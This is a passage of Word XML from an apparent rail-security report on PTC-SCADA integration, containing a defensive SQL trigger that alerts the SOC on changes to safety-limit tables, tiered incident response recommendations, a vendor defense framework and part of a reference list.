        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Database Activity Monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002BA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Real-time detection of PTC table modifications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Deploy on SCADA historian database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CREATE TRIGGER PTC_Security_Monitor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ON PTC_Config.SafetyLimits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AFTER UPDATE, DELETE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BEGIN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DECLARE @user VARCHAR(100) = SYSTEM_USER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DECLARE @action VARCHAR(10)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CASE WHEN EXISTS(SELECT * FROM deleted)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AND EXISTS(SELECT * FROM inserted) THEN 'UPDATE'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WHEN EXISTS(SELECT * FROM deleted) THEN 'DELETE'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END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Alert on any safety limit changes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IF @action IS NOT NULL</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BEGIN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INSERT INTO Security.Alerts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Timestamp, Severity, Message, Username, Details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VALUES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GETDATE(),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'CRITICAL',</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'PTC Safety Configuration Modified',</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@user,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(SELECT * FROM deleted FOR JSON AUTO)</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Trigger immediate SOC notification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EXEC msdb.dbo.sp_send_dbmail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@recipients = 'soc@railroad.com',</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@subject = 'CRITICAL: PTC Safety Modification',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@body = 'Immediate investigation required'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END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END</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002FD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ne6yu1jowepa" w:id="43"/>
      <w:bookmarkEnd w:id="43"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Response Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002FE">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_w8c26mi2dh4g" w:id="44"/>
      <w:bookmarkEnd w:id="44"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Immediate Actions (0-15 minutes)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002FF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Isolate affected SCADA nodes</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> from PTC gateways </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref84">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[84]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000300">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enable PTC local control mode</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> bypassing SCADA </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref85">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[85]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000301">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Deploy incident response team</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with ICS expertise </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref86">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[86]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000302">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Halt all train movements</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in affected territories </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref87">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[87]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000303">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_gsx4fulemhi2" w:id="45"/>
      <w:bookmarkEnd w:id="45"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Containment (15-60 minutes)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000304">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Activate backup dispatch centers</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with isolated systems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305">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reset all SCADA-PTC integration credentials</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">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306">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enable manual safety verification</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> procedures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307">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement emergency network segmentation</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">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308">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_g6pqbx9yu60x" w:id="46"/>
      <w:bookmarkEnd w:id="46"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Recovery (1-24 hours)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000309">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Forensic analysis</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> of SCADA and PTC logs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30A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Validate all PTC safety configurations</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">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30B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Phased service restoration</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with enhanced monitoring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30C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Regulatory notification</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> per TSA requirements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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_b2aimtgym114" w:id="47"/>
      <w:bookmarkEnd w:id="47"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tri-Partner Solution Framework</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000310">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_6o2xr6r8ukn2" w:id="48"/>
      <w:bookmarkEnd w:id="48"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Integrated Defense Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000311">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addresses PTC-SCADA integration vulnerabilities </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref96">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[96]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000312">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_dynsmcbo4471" w:id="49"/>
      <w:bookmarkEnd w:id="49"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NCC Group OTCE Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000313">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Architecture Review</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: End-to-end SCADA-PTC data flow analysis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314">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Penetration Testing</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Controlled exploitation of integration points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315">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Secure Design</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Zero-trust architecture for safety systems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316">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_qiwucgbppr5d" w:id="50"/>
      <w:bookmarkEnd w:id="50"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dragos Platform Intelligence</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000317">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Integration Monitoring</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: SCADA-to-PTC command validation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318">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Threat Detection</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: CARBIDE group TTP identification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319">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Asset Context</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: PTC device inventory and vulnerability mapping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31A">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_fhz7ydid4pr8" w:id="51"/>
      <w:bookmarkEnd w:id="51"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Adelard Safety-Security</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000031B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hazard Analysis</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Combined cyber-physical failure modes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31C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SIL Verification</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Maintain safety integrity during security updates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31D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Barrier Design</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Independent safety and security layers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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ywlrjzg09k2z" w:id="52"/>
      <w:bookmarkEnd w:id="52"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">References &amp; Citations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000321">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_387w0vsgl18j" w:id="53"/>
      <w:bookmarkEnd w:id="53"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Primary Intelligence Sources</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000322">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[1] Transportation Security Administration, "PTC-SCADA Integration Security Assessment," TSA-SD-2025-03, March 2025.</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 CISA, "Legacy Systems in Rail Dispatch Centers," ICS-CERT Advisory ICSA-25-042-01, February 2025.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 Federal Railroad Administration, "Safety-Critical System Architecture Review," FRA-2025-0003, January 2025.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000327">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_qwytgwoeexlf" w:id="54"/>
      <w:bookmarkEnd w:id="54"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability Research</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000328">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[19] Anonymous Researcher, "PTC-SCADA Bridge: A Safety Nightmare," DEF CON 31 Presentation, August 2023.</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[21] HD Moore, "Railway SCADA: Windows XP Forever," Rapid7 Research, December 2024.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000032B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_rdbif8vkp1om" w:id="55"/>
      <w:bookmarkEnd w:id="55"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Incident Documentation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000032C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[63] Class I Railroad CIRT, "SCADA Compromise Post-Mortem," Confidential Release, January 2025.</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[65] Dragos Inc., "CARBIDE PTC Targeting Analysis," Threat Intelligence Report, March 2025.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000032F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_etqx6dmse3j" w:id="56"/>
      <w:bookmarkEnd w:id="56"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Architecture Analysis</w:t>
      </w:r>
    </w:p>
